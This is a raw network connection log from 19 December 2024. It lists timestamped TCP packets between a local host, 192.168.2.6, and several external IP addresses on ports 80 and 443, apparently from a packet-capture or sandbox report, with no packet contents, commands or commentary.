Dec 19, 2024 10:10:23.672072887 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.672120094 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.672724962 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.672771931 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.672907114 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.672950983 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.673480034 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.673523903 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.673679113 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.673726082 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.674321890 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.674371004 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.674443960 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.674490929 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.674998999 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.675045013 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.675189018 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.675232887 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.675818920 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.675865889 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.676006079 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.676050901 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.678416014 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.678621054 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.679456949 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.679478884 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.679507017 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.679523945 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.679609060 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.679625988 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.679644108 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.679656982 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.679668903 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.679682016 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.679692984 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.679722071 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.679790020 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.679833889 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.680731058 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.680790901 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.681005001 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.681052923 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.682023048 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.682039022 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.682070017 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.682080030 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.682905912 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.682924032 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.682954073 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.682965994 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.683471918 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.683521986 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.683651924 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.683698893 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.684135914 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.684180975 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.684317112 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.684540987 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.685194016 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.685209990 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.685244083 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.685254097 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.685921907 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.685970068 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.686099052 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.686146021 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.686775923 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.686825991 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.686909914 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.686954021 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.687813044 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.687829971 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.687861919 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.687891006 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.688565969 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.688582897 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.688615084 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.688627958 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.689450979 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.689467907 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.689506054 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.689519882 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.690469027 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.690517902 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.690649033 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.690691948 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.691299915 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.691346884 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.825407982 CET	443	49891	20.198.118.190	192.168.2.6
Dec 19, 2024 10:10:23.825540066 CET	49891	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:10:23.828865051 CET	49891	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:10:23.828922987 CET	443	49891	20.198.118.190	192.168.2.6
Dec 19, 2024 10:10:23.829282045 CET	443	49891	20.198.118.190	192.168.2.6
Dec 19, 2024 10:10:23.837012053 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.837042093 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.837248087 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.837248087 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.837338924 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.837380886 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.837444067 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.837481976 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.837491989 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.837534904 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.838875055 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.838917971 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.839246988 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.839291096 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.840552092 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.840600014 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.840754032 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.840796947 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.841873884 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.841917038 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.842036963 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.842077971 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.843339920 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.843386889 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.843513966 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.843556881 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.844862938 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.844906092 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.845544100 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.845586061 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.845959902 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.845999956 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.846127033 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.846168041 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.846853018 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.846895933 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.847419977 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.847438097 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.847460032 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.847480059 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.847546101 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.847585917 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.848366022 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.848408937 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.848572969 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.848615885 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.849050999 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.849092007 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.849258900 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.849301100 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.849900961 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.849942923 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.850189924 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.850230932 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.850764990 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.850790024 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.850805998 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.850831985 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.851402998 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.851444960 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.851520061 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.851557970 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.852129936 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.852170944 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.852256060 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.852296114 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.856765032 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.856791019 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.856829882 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.856843948 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.856844902 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.856865883 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.856879950 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.856897116 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.856920004 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.856930971 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.856930971 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.856955051 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.857373953 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.857426882 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.857566118 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.857608080 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.858091116 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.858133078 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.858629942 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.858674049 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.859136105 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.859179020 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.859776020 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.859814882 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.862893105 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.862940073 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.863404989 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.863455057 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.864172935 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.864218950 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.873855114 CET	49891	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:10:23.873949051 CET	49891	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:10:23.873987913 CET	443	49891	20.198.118.190	192.168.2.6
Dec 19, 2024 10:10:23.874023914 CET	49891	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:10:23.915421963 CET	443	49891	20.198.118.190	192.168.2.6
Dec 19, 2024 10:10:24.419533968 CET	443	49891	20.198.118.190	192.168.2.6
Dec 19, 2024 10:10:24.419673920 CET	443	49891	20.198.118.190	192.168.2.6
Dec 19, 2024 10:10:24.419759035 CET	49891	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:10:24.419977903 CET	49891	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:10:24.420021057 CET	443	49891	20.198.118.190	192.168.2.6
Dec 19, 2024 10:10:26.911148071 CET	49879	80	192.168.2.6	185.215.113.43
Dec 19, 2024 10:10:26.911412001 CET	49904	80	192.168.2.6	185.215.113.43
Dec 19, 2024 10:10:27.036159039 CET	80	49904	185.215.113.43	192.168.2.6
Dec 19, 2024 10:10:27.036202908 CET	80	49879	185.215.113.43	192.168.2.6
Dec 19, 2024 10:10:27.036240101 CET	49904	80	192.168.2.6	185.215.113.43
Dec 19, 2024 10:10:27.036277056 CET	49879	80	192.168.2.6	185.215.113.43
Dec 19, 2024 10:10:27.036595106 CET	49904	80	192.168.2.6	185.215.113.43
Dec 19, 2024 10:10:27.156980038 CET	80	49904	185.215.113.43	192.168.2.6
Dec 19, 2024 10:10:27.510699987 CET	49908	443	192.168.2.6	172.67.179.109
Dec 19, 2024 10:10:27.510737896 CET	443	49908	172.67.179.109	192.168.2.6
Dec 19, 2024 10:10:27.510816097 CET	49908	443	192.168.2.6	172.67.179.109
Dec 19, 2024 10:10:27.511759996 CET	49908	443	192.168.2.6	172.67.179.109
Dec 19, 2024 10:10:27.511775017 CET	443	49908	172.67.179.109	192.168.2.6
Dec 19, 2024 10:10:28.036856890 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:28.156719923 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:28.156825066 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:28.157758951 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:28.277579069 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:28.371663094 CET	80	49904	185.215.113.43	192.168.2.6
Dec 19, 2024 10:10:28.371819973 CET	49904	80	192.168.2.6	185.215.113.43
Dec 19, 2024 10:10:28.374840021 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:28.375271082 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:28.495233059 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:28.495378017 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:28.495560884 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:28.504700899 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:28.504784107 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:28.615101099 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:28.725759029 CET	443	49908	172.67.179.109	192.168.2.6
Dec 19, 2024 10:10:28.725831985 CET	49908	443	192.168.2.6	172.67.179.109
Dec 19, 2024 10:10:28.727065086 CET	49908	443	192.168.2.6	172.67.179.109
Dec 19, 2024 10:10:28.727072954 CET	443	49908	172.67.179.109	192.168.2.6
Dec 19, 2024 10:10:28.727411985 CET	443	49908	172.67.179.109	192.168.2.6
Dec 19, 2024 10:10:28.770339966 CET	49908	443	192.168.2.6	172.67.179.109
Dec 19, 2024 10:10:28.770355940 CET	49908	443	192.168.2.6	172.67.179.109
Dec 19, 2024 10:10:28.770431042 CET	443	49908	172.67.179.109	192.168.2.6
Dec 19, 2024 10:10:29.508976936 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:29.509048939 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:29.522423029 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:29.643126965 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:30.109616041 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.109657049 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.109689951 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.109725952 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.109726906 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.109726906 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.109726906 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.109817982 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.109833002 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.109869003 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.109884024 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.109905958 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.109940052 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.109945059 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.109977007 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.109983921 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.110003948 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.110013008 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.110024929 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.110066891 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.112386942 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:30.112445116 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:30.112931013 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.112988949 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.113142014 CET	443	49878	172.67.179.109	192.168.2.6
Dec 19, 2024 10:10:30.113290071 CET	443	49878	172.67.179.109	192.168.2.6
Dec 19, 2024 10:10:30.113342047 CET	49878	443	192.168.2.6	172.67.179.109
Dec 19, 2024 10:10:30.113876104 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:30.117177010 CET	49878	443	192.168.2.6	172.67.179.109
Dec 19, 2024 10:10:30.117223024 CET	443	49878	172.67.179.109	192.168.2.6
Dec 19, 2024 10:10:30.126231909 CET	49916	443	192.168.2.6	172.67.179.109
Dec 19, 2024 10:10:30.126316071 CET	443	49916	172.67.179.109	192.168.2.6
Dec 19, 2024 10:10:30.126394987 CET	49916	443	192.168.2.6	172.67.179.109
Dec 19, 2024 10:10:30.126764059 CET	49916	443	192.168.2.6	172.67.179.109
Dec 19, 2024 10:10:30.126801014 CET	443	49916	172.67.179.109	192.168.2.6
Dec 19, 2024 10:10:30.230307102 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.230405092 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.232525110 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.232611895 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.232615948 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.232671022 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.233694077 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:30.241370916 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.241431952 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.241619110 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.241674900 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.249180079 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.249263048 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.249300003 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.249361992 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.257699013 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.257736921 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.257766962 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.257802010 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.265929937 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.266007900 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.266092062 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.266258955 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.274596930 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.274650097 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.274681091 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.274717093 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.282710075 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.282774925 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.282782078 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.282825947 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.291260958 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.291335106 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.291407108 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.291462898 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.299659014 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.299721003 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.350234032 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.350425005 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.352149963 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.352276087 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.356524944 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.356586933 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.361303091 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.361361027 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.361397028 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.361452103 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.369515896 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.369560003 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.369586945 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.369637966 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.377664089 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.377705097 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.377727032 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.377760887 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.385739088 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.385782957 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.385802031 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.385834932 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.394118071 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.394177914 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.394181013 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.394242048 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.402416945 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.402468920 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.402635098 CET	80	49910	185.215.113.16	192.168.2.6
